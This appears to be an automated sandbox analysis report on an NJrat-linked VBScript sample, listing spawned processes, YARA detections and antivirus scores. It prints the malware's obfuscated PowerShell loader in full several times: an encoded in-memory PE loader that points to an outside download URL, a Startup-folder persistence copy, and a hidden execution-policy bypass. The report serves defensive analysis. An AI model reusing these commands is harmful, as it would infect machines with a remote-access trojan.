Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 22686
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 21980
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 22686
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 22686 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 21980 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 22686 Jump to behavior
Yara signature match
Source: 16.2.powershell.exe.21665e70000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 16.2.powershell.exe.2164dccfa28.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 00000010.00000002.355723069.000002165D9D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.355709733.000002165D9B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.354839665.000002164DEDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.354821380.000002164DEC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: Process Memory Space: powershell.exe PID: 6844, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5608, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 5608, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFC08450040 16_2_00007FFC08450040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 22_2_0316B4E0 22_2_0316B4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 22_2_0316E3F8 22_2_0316E3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 22_2_0316C8A8 22_2_0316C8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 22_2_03165048 22_2_03165048
Java / VBScript file with very long strings (likely obfuscated code)
Source: NJratccccassssG2.00.vbs Initial sample: Strings found which are bigger than 50
Source: NJratccccassssG2.00.vbs Virustotal: Detection: 29%
Source: NJratccccassssG2.00.vbs Metadefender: Detection: 14%
Source: NJratccccassssG2.00.vbs ReversingLabs: Detection: 25%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NJratccccassssG2.00.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? 